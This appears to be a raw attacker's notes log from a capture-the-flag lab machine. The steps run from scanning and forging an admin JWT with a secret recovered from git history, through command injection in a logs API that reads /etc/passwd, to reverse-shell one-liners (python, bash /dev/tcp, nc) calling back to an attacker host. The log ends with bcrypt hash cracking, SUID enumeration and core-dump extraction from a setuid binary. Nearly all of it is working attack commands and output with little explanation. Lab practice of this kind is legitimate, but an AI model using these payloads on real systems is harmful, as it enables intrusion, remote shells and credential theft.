sudo nmap -sC -sS -sV 10.129.253.127
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-02 17:01 CST
Nmap scan report for 10.129.253.127 (10.129.253.127)
Host is up (0.15s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
|   256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_  256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: DUMB Docs
3000/tcp open  http    Node.js (Express middleware)
|_http-title: DUMB Docs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.80 seconds

#http://10.129.253.127/api/
#http://10.129.253.127/docs
#http://10.129.253.127/download/files.zip

unzip files.zip

DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = secret

http://10.129.253.127/api/priv


router.get('/logs', verifytoken, (req, res) => {
    const file = req.query.file;
    const userinfo = { name: req.user }
    const name = userinfo.name.name;
    
    if (name == 'theadmin'){
        const getLogs = `git log --oneline ${file}`;
        exec(getLogs, (err , output) =>{
            if(err){
                res.status(500).send(err);
                return
            }
            res.json(output);
        })
    }
    else{
        res.json({
            role: {
                role: "you are normal user",
                desc: userinfo.name.name
            }
        })
    }
})

module.exports = function (req, res, next) {
    const token = req.header("auth-token");
    if (!token) return res.status(401).send("Access Denied");

    try {
        const verified = jwt.verify(token, process.env.TOKEN_SECRET);
        req.user = verified;
        next();
    } catch (err) {
        res.status(400).send("Invalid Token");
    }
};

curl --location --request POST 'http://10.129.253.127:3000/api/user/register' \
--header 'Content-Type: application/json' \
--data-raw '{
    "name": "theadmin",
    "email": "pwm2@htb.com",
    "password": "123456"
}'

curl --location --request POST 'http://10.129.253.127:3000/api/user/login' \
--header 'Content-Type: application/json' \
--data-raw '{
    "email": "pwm@htb.com",
    "password": "123456"
}'

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTgxYzljNDdjODBiNDA0N2U5N2JkNGIiLCJuYW1lIjoicHdtcHdtIiwiZW1haWwiOiJwd21AaHRiLmNvbSIsImlhdCI6MTYzNTg5NTgwNn0.nlUq7oZKbzto9MG9WTwcHxlETZDhVkDqsM8WTy1TIt4

curl --location --request GET 'http://10.129.253.127:3000/api/priv' \
--header 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTgxYzljNDdjODBiNDA0N2U5N2JkNGIiLCJuYW1lIjoicHdtcHdtIiwiZW1haWwiOiJwd21AaHRiLmNvbSIsImlhdCI6MTYzNTg5NTgwNn0.nlUq7oZKbzto9MG9WTwcHxlETZDhVkDqsM8WTy1TIt4'

{
    "role": {
        "role": "you are normal user",
        "desc": "pwmpwm"
    }
}


https://stackoverflow.com/questions/359494/which-equals-operator-vs-should-be-used-in-javascript-comparisons

' \t\r\n ' == 0     // true


curl --location --request POST 'http://10.129.253.127:3000/api/user/register' \
--header 'Content-Type: application/json' \
--data-raw '{
    "name": "theadmin\r",
    "email": "pwm2@htb.com",
    "password": "123456"
}'

curl --location --request POST 'http://10.129.253.127:3000/api/user/login' \
--header 'Content-Type: application/json' \
--data-raw '{
    "email": "pwm2@htb.com",
    "password": "123456"
}'

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTgxY2Q1OTdjODBiNDA0N2U5N2JkNTMiLCJuYW1lIjoidGhlYWRtaW5cciIsImVtYWlsIjoicHdtMkBodGIuY29tIiwiaWF0IjoxNjM1ODk2ODk2fQ.YtfSnWiHEfmXQKPif5R2cwkvoJJ5WvbtpavvYcp6yMU

curl --location --request GET 'http://10.129.253.127:3000/api/priv' \
--header 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTgxY2Q1OTdjODBiNDA0N2U5N2JkNTMiLCJuYW1lIjoidGhlYWRtaW5cciIsImVtYWlsIjoicHdtMkBodGIuY29tIiwiaWF0IjoxNjM1ODk2ODk2fQ.YtfSnWiHEfmXQKPif5R2cwkvoJJ5WvbtpavvYcp6yMU'

{
    "role": {
        "role": "you are normal user",
        "desc": "pwmpwm"
    }
}


curl --location --request POST 'http://10.129.253.127:3000/api/user/login' \
--header 'Content-Type: application/json' \
--data-raw '{
    "email": "root@dasith.works",
    "password": "Kekc8swFgD6zU"
}'

const jwt = require('jsonwebtoken')
const token = jwt.sign({_id: "6114654d77f9a54e00f05777", name: "theadmin", email:"root@dasith.works"}, process.env.TOKEN_SECRET )
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTE0NjU0ZDc3ZjlhNTRlMDBmMDU3NzciLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRoLndvcmtzIiwiaWF0IjoxNjM1ODk5ODMzfQ.kSbtjDBtg64jy89SjX3WRToOxGZUM_q5OoX-AsnTVak
jwt.verify(token, process.env.TOKEN_SECRET)

curl --location --request GET 'http://10.129.253.127:3000/api/priv' \
--header 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTE0NjU0ZDc3ZjlhNTRlMDBmMDU3NzciLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRoLndvcmtzIiwiaWF0IjoxNjM1ODk5ODMzfQ.kSbtjDBtg64jy89SjX3WRToOxGZUM_q5OoX-AsnTVak'


# dumb, should have checked this before :facepalm:
git checkout de0a46b5107a2f4d26e348303e76d85ae487093

DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE

const jwt = require('jsonwebtoken')
const token = jwt.sign({_id: "6114654d77f9a54e00f05777", name: "theadmin", email:"root@dasith.works"}, process.env.TOKEN_SECRET )
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTE0NjU0ZDc3ZjlhNTRlMDBmMDU3NzciLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRoLndvcmtzIiwiaWF0IjoxNjM1ODk5ODMzfQ.kSbtjDBtg64jy89SjX3WRToOxGZUM_q5OoX-AsnTVak
jwt.verify(token, process.env.TOKEN_SECRET)

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTE0NjU0ZDc3ZjlhNTRlMDBmMDU3NzciLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRoLndvcmtzIiwiaWF0IjoxNjM1OTAwNjI0fQ.xoEEGHfmW3V3t4py8Pq2rXspPw6758SlBrISMiPMNyE

curl --location --request GET 'http://10.129.253.127:3000/api/priv' \
--header 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTE0NjU0ZDc3ZjlhNTRlMDBmMDU3NzciLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRoLndvcmtzIiwiaWF0IjoxNjM1OTAwNjI0fQ.xoEEGHfmW3V3t4py8Pq2rXspPw6758SlBrISMiPMNyE'

{"creds":{"role":"admin","username":"theadmin","desc":"welcome back admin"}}

curl --location --request GET 'http://10.129.253.127:3000/api/logs?file=%26%26 cat /etc/passwd' \
--header 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTE0NjU0ZDc3ZjlhNTRlMDBmMDU3NzciLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRoLndvcmtzIiwiaWF0IjoxNjM1OTAwNjI0fQ.xoEEGHfmW3V3t4py8Pq2rXspPw6758SlBrISMiPMNyE'

"80bf34c fixed typos 🎉\n0c75212 now we can view logs from server 😃\nab3e953 Added the codes\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nsystemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\nmessagebus:x:103:106::/nonexistent:/usr/sbin/nologin\nsyslog:x:104:110::/home/syslog:/usr/sbin/nologin\n_apt:x:105:65534::/nonexistent:/usr/sbin/nologin\ntss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false\nuuidd:x:107:112::/run/uuidd:/usr/sbin/nologin\ntcpdump:x:108:113::/nonexistent:/usr/sbin/nologin\nlandscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin\npollinate:x:110:1::/var/cache/pollinate:/bin/false\nusbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin\nsshd:x:112:65534::/run/sshd:/usr/sbin/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\ndasith:x:1000:1000:dasith:/home/dasith:/bin/bash\nlxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false\nmongodb:x:113:117::/var/lib/mongodb:/usr/sbin/nologin\n"


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
dasith:x:1000:1000:dasith:/home/dasith:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mongodb:x:113:117::/var/lib/mongodb:/usr/sbin/nologin

user = dasith   
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.77",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
bash -i >& /dev/tcp/10.10.15.77/9000 0>&1
nc -e /bin/bash 10.10.15.77 9000


curl --location --request GET 'http://10.129.253.127:3000/api/logs?file=%26%26 cd /home/dasith %26%26 ls %26%26 cat user.txt' \
--header 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTE0NjU0ZDc3ZjlhNTRlMDBmMDU3NzciLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRoLndvcmtzIiwiaWF0IjoxNjM1OTAwNjI0fQ.xoEEGHfmW3V3t4py8Pq2rXspPw6758SlBrISMiPMNyE'

curl --location -g --request GET 'http://10.129.253.127:3000/api/logs?file=%26%26 python3 -c '\''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.77",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'\''' \
--header 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTE0NjU0ZDc3ZjlhNTRlMDBmMDU3NzciLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRoLndvcmtzIiwiaWF0IjoxNjM1OTAwNjI0fQ.xoEEGHfmW3V3t4py8Pq2rXspPw6758SlBrISMiPMNyE'

python3 -c 'import pty;  pty.spawn("/bin/bash")'

node

const mongoose = require('mongoose');

mongoose.connect('mongodb://127.0.0.1:27017/auth-web', { useNewUrlParser: true }, () =>
    console.log("connect to db!")
);

const User = require('./model/user');

let user = User.findOne({email:'root@dasith.works'}).exec()

{ _id: 6131d73387dee30378c66556,
    name: 'newuser',
    email: 'root@dasith.works',
    password:
     '$2a$10$wnvh2al2ABafCszb9oWi/.YIXHX4RrTUiWAIVUlv2Z80lkvmlIUQW',
    date: 2021-09-03T08:05:07.991Z,
    __v: 0 }

john -format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hashed.txt

Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mypassword       (?)
1g 0:00:00:26 DONE (2021-11-02 19:32) 0.03806g/s 82.22p/s 82.22c/s 82.22C/s penelope..myfamily
Use the "--show" option to display all of the cracked passwords reliably
Session completed

cd /opt

dasith@secret:/opt$ ls -la
ls -la
total 56
drwxr-xr-x  2 root root  4096 Oct  7 10:06 .
drwxr-xr-x 20 root root  4096 Oct  7 15:01 ..
-rw-r--r--  1 root root  3736 Oct  7 10:01 code.c
-rw-r--r--  1 root root 16384 Oct  7 10:01 .code.c.swp
-rwsr-xr-x  1 root root 17824 Oct  7 10:03 count
-rw-r--r--  1 root root  4622 Oct  7 10:04 valgrind.log

python3 -m http.server 7899

wget 10.129.253.127:7899/count.c

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null

-rwxr-sr-x 1 root shadow 43160 Sep 17 06:14 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 43168 Sep 17 06:14 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root tty 14488 Mar 30  2020 /usr/bin/bsd-write
-rwsr-xr-x 1 root root 31032 May 26 11:50 /usr/bin/pkexec
-rwxr-sr-x 1 root tty 35048 Jul 21  2020 /usr/bin/wall
-rwsr-xr-x 1 root root 166056 Jan 19  2021 /usr/bin/sudo
-rwxr-sr-x 1 root shadow 31312 Jul 14 22:08 /usr/bin/expiry
-rwsr-xr-x 1 root root 39144 Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 39144 Jul 21  2020 /usr/bin/umount
-rwsr-xr-x 1 root root 55528 Jul 21  2020 /usr/bin/mount
-rwxr-sr-x 1 root ssh 350504 Jul 23 12:55 /usr/bin/ssh-agent
-rwsr-xr-x 1 root root 88464 Jul 14 22:08 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 67816 Jul 21  2020 /usr/bin/su
-rwsr-xr-x 1 root root 68208 Jul 14 22:08 /usr/bin/passwd
-rwsr-xr-x 1 root root 85064 Jul 14 22:08 /usr/bin/chfn
-rwsr-xr-x 1 root root 44784 Jul 14 22:08 /usr/bin/newgrp
-rwxr-sr-x 1 root crontab 43720 Feb 13  2020 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 84512 Jul 14 22:08 /usr/bin/chage
-rwsr-xr-x 1 root root 53040 Jul 14 22:08 /usr/bin/chsh
-rwxr-sr-x 1 root utmp 14648 Sep 30  2019 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwsr-xr-x 1 root root 130408 Sep  9 14:34 /usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root messagebus 51344 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 473576 Jul 23 12:55 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14488 Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 22840 May 26 11:50 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 17824 Oct  7 10:03 /opt/count
-rwsr-xr-x 1 root root 115208 Oct  5 13:58 /snap/snapd/13640/usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 111080 Aug 27 23:20 /snap/snapd/13170/usr/lib/snapd/snap-confine
-rwxr-sr-x 1 root shadow 84512 Jul 14 22:08 /snap/core20/1169/usr/bin/chage
-rwsr-xr-x 1 root root 85064 Jul 14 22:08 /snap/core20/1169/usr/bin/chfn
-rwsr-xr-x 1 root root 53040 Jul 14 22:08 /snap/core20/1169/usr/bin/chsh
-rwxr-sr-x 1 root shadow 31312 Jul 14 22:08 /snap/core20/1169/usr/bin/expiry
-rwsr-xr-x 1 root root 88464 Jul 14 22:08 /snap/core20/1169/usr/bin/gpasswd
-rwsr-xr-x 1 root root 55528 Jul 21  2020 /snap/core20/1169/usr/bin/mount
-rwsr-xr-x 1 root root 44784 Jul 14 22:08 /snap/core20/1169/usr/bin/newgrp
-rwsr-xr-x 1 root root 68208 Jul 14 22:08 /snap/core20/1169/usr/bin/passwd
-rwxr-sr-x 1 root crontab 350504 Jul 23 12:55 /snap/core20/1169/usr/bin/ssh-agent
-rwsr-xr-x 1 root root 67816 Jul 21  2020 /snap/core20/1169/usr/bin/su
-rwsr-xr-x 1 root root 166056 Jan 19  2021 /snap/core20/1169/usr/bin/sudo
-rwsr-xr-x 1 root root 39144 Jul 21  2020 /snap/core20/1169/usr/bin/umount
-rwxr-sr-x 1 root tty 35048 Jul 21  2020 /snap/core20/1169/usr/bin/wall
-rwsr-xr-- 1 root systemd-resolve 51344 Jun 11  2020 /snap/core20/1169/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 473576 Jul 23 12:55 /snap/core20/1169/usr/lib/openssh/ssh-keysign
-rwxr-sr-x 1 root shadow 43168 Apr  8  2021 /snap/core20/1169/usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 43160 Apr  8  2021 /snap/core20/1169/usr/sbin/unix_chkpwd
-rwsr-xr-x 1 root root 43088 Sep 16  2020 /snap/core18/2128/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /snap/core18/2128/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /snap/core18/2128/bin/su
-rwsr-xr-x 1 root root 26696 Sep 16  2020 /snap/core18/2128/bin/umount
-rwxr-sr-x 1 root shadow 34816 Apr  8  2021 /snap/core18/2128/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34816 Apr  8  2021 /snap/core18/2128/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 71816 Mar 22  2019 /snap/core18/2128/usr/bin/chage
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /snap/core18/2128/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /snap/core18/2128/usr/bin/chsh
-rwxr-sr-x 1 root shadow 22808 Mar 22  2019 /snap/core18/2128/usr/bin/expiry
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /snap/core18/2128/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /snap/core18/2128/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /snap/core18/2128/usr/bin/passwd
-rwxr-sr-x 1 root crontab 362640 Mar  4  2019 /snap/core18/2128/usr/bin/ssh-agent
-rwsr-xr-x 1 root root 149080 Jan 19  2021 /snap/core18/2128/usr/bin/sudo
-rwxr-sr-x 1 root tty 30800 Sep 16  2020 /snap/core18/2128/usr/bin/wall
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 11  2020 /snap/core18/2128/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /snap/core18/2128/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43088 Sep 16  2020 /snap/core18/1944/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /snap/core18/1944/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /snap/core18/1944/bin/su
-rwsr-xr-x 1 root root 26696 Sep 16  2020 /snap/core18/1944/bin/umount
-rwxr-sr-x 1 root shadow 34816 Jul 21  2020 /snap/core18/1944/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34816 Jul 21  2020 /snap/core18/1944/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 71816 Mar 22  2019 /snap/core18/1944/usr/bin/chage
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /snap/core18/1944/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /snap/core18/1944/usr/bin/chsh
-rwxr-sr-x 1 root shadow 22808 Mar 22  2019 /snap/core18/1944/usr/bin/expiry
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /snap/core18/1944/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /snap/core18/1944/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /snap/core18/1944/usr/bin/passwd
-rwxr-sr-x 1 root crontab 362640 Mar  4  2019 /snap/core18/1944/usr/bin/ssh-agent
-rwsr-xr-x 1 root root 149080 Sep 23  2020 /snap/core18/1944/usr/bin/sudo
-rwxr-sr-x 1 root tty 30800 Sep 16  2020 /snap/core18/1944/usr/bin/wall
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 11  2020 /snap/core18/1944/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /snap/core18/1944/usr/lib/openssh/ssh-keysig

https://stackoverflow.com/questions/23486258/how-to-get-a-list-of-files-opened-and-closed-by-a-program-execution
https://catonmat.net/simple-ld-preload-tutorial-part-two


sysctl kernel.core_pattern

kill -ABRT 9721

https://stackoverflow.com/questions/2065912/core-dumped-but-core-file-is-not-in-the-current-directory


cd /var/Crash
wget 10.10.11.120:7899/_opt_count.1000.crash

apport-unpack _opt_count.1000.crash /home/dasith/unpack.crash

wget 10.10.11.120:7899/CoreDump

strings CoreDump